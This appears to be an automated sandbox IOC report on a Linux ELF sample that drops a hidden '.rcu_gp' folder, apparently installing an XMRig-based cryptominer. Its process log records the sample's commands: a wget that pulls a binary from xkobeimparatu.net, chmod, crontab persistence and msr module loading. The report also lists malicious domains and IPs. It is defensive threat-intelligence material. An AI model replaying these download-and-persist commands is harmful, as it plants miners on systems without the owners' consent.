IOC Report
.main.elf

loading gif

Files

File Path
Type
Category
Malicious
.main.elf
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/var/spool/cron/crontabs/tmp.VYCskO
ASCII text
dropped
 malicious
/var/tmp/.rcu_gp/.ps5
ASCII text
dropped
 malicious
/var/tmp/.rcu_gp/.report_system
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, missing section headers at 8825120
dropped
 malicious
/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
ASCII text, with no line terminators
dropped
/tmp/sh-thd.QhlKa3
Bourne-Again shell script, ASCII text executable
dropped
/var/tmp/.rcu_gp/.ps4
ASCII text
dropped
/var/tmp/.rcu_gp/diicot
Bourne-Again shell script, ASCII text executable
dropped

Processes

Path
Cmdline
Malicious
/tmp/.main.elf
/tmp/.main.elf
/bin/bash
/tmp/.main.elf -c "exec '/tmp/.main.elf' \"$@\"" /tmp/.main.elf
/tmp/.main.elf
/tmp/.main.elf
/bin/bash
/tmp/.main.elf -c " " /tmp/.main.elf
/bin/bash
-
/usr/bin/mkdir
mkdir /var/tmp/.rcu_gp
/bin/bash
-
/usr/bin/wget
wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system
/bin/bash
-
/usr/bin/chmod
chmod +x .report_system
/bin/bash
-
/usr/bin/cat
cat
/bin/bash
-
/usr/bin/chmod
chmod +x /var/tmp/.rcu_gp/diicot
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/rm
rm -rf /var/tmp/.rcu_gp/.ps5
/bin/bash
-
/usr/bin/sleep
sleep 1
/bin/bash
-
/usr/bin/sleep
sleep 1
/bin/bash
-
/usr/bin/sleep
sleep 1
/bin/bash
-
/usr/bin/crontab
crontab /var/tmp/.rcu_gp/.ps5
/bin/bash
-
/usr/bin/sleep
sleep 1
/bin/bash
-
/usr/bin/rm
rm -rf /var/tmp/.rcu_gp/.ps5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/var/tmp/.rcu_gp/diicot
-
/var/tmp/.rcu_gp/./.report_system
/var/tmp/.rcu_gp/./.report_system
/var/tmp/.rcu_gp/./.report_system
-
/var/tmp/.rcu_gp/./.report_system
-
/bin/sh
sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
/bin/sh
-
/sbin/modprobe
/sbin/modprobe msr allow_writes=on
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
/bin/bash
-
/usr/bin/crontab
crontab -l
/bin/bash
-
/usr/bin/grep
grep -q .main
/bin/bash
-
/usr/bin/sleep
sleep 2.5
/bin/bash
-
/usr/bin/cat
cat /var/tmp/.rcu_gp/.ps4
/bin/bash
-
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
/var/tmp/.rcu_gp/diicot
-
/usr/bin/pgrep
pgrep -x .report_system
There are 119 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://xmrig.com/benchmark/%s
unknown
https://bugs.launchpad.net/ubuntu/
unknown
https://xmrig.com/wizard
unknown
http://xkobeimparatu.net/.puscarie/.report_system
66.63.187.195
https://gcc.gnu.org/bugsterminate
unknown
https://xmrig.com/wizard%s
unknown
https://xmrig.com/docs/algorithms
unknown

Domains

Name
IP
Malicious
xkobeproxy.xkobeimparatu.net
91.184.240.129
 malicious
xkobeimparatu.net
66.63.187.195

IPs

IP
Domain
Country
Malicious
91.184.240.129
xkobeproxy.xkobeimparatu.net
Russian Federation
malicious
66.63.187.195
xkobeimparatu.net
United States
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
c29000
page execute read
 malicious
7f9394f79000
page read and write
f07000
page read and write
7f93952f0000
page read and write
e6b000
page read and write
7f9394f77000
page execute read
115c000
page read and write
7ffe81e0f000
page read and write
7f939516b000
page read and write
7f9395335000
page read and write
7ffe81f11000
page execute read
There are 1 hidden memdumps, click here to show them.